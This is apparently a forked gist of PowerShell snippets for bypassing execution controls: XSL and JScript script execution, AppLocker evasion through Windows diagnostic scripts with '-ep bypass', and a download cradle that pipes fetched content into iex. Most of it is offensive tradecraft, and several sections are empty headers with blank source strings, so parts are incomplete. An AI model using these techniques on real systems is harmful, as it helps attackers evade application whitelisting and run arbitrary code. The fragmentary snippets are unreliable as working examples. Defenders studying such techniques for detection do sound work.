Forked from S3cur3Th1sSh1t/PowerShell.txt
Created July 14, 2024 18:37
Snippets of PowerShell bypass/evasion/execution techniques that are interesting
### Powershell Xml/Xsl Assembly "Fetch & Execute"
$s=New-Object System.Xml.Xsl.XsltSettings;$r=New-Object System.Xml.XmlUrlResolver;$s.EnableScript=1;$x=New-Object System.Xml.Xsl.XslCompiledTransform;$x.Load('',$s,$r);$x.Transform('','z');del z;
### Powershell VBScript Assembly SCT "Fetch & Execute"
### Powershell JScript Assembly SCT "Fetch & Execute"
### Powershell JScript Assembly ActiveXObject Script Execution
### [@gabemarshall -]
[Reflection.Assembly]::LoadWithPartialName('Microsoft.JScript');$js = 'var js = new ActiveXObject("WScript.Shell");js.Run("calc");';[Microsoft.JScript.Eval]::JScriptEvaluate($js,[Microsoft.JScript.Vsa.VsaEngine]::CreateEngine());
### Loading .Net/C# Assemblies to Bypass AppLocker Default Rules w/ PowerShell Diagnostic Scripts
powershell -v 2 -ep bypass
cd C:\windows\diagnostics\system\AERO
import-module .\CL_LoadAssembly.ps1
LoadAssemblyFromPath ..\..\..\..\path\assembly.exe
### Command Invocation w/ PowerShell Diagnostic Scripts
powershell -v 2 -ep bypass
cd C:\windows\diagnostics\system\AERO
import-module CL_Invocation.ps1
SyncInvoke notepad.exe
### PowerShell CL Download Cradle
### [@subtee -]
### [@HarmJ0y -]
$a = New-Object System.Xml.XmlDocument
$a.command.a.execute | iex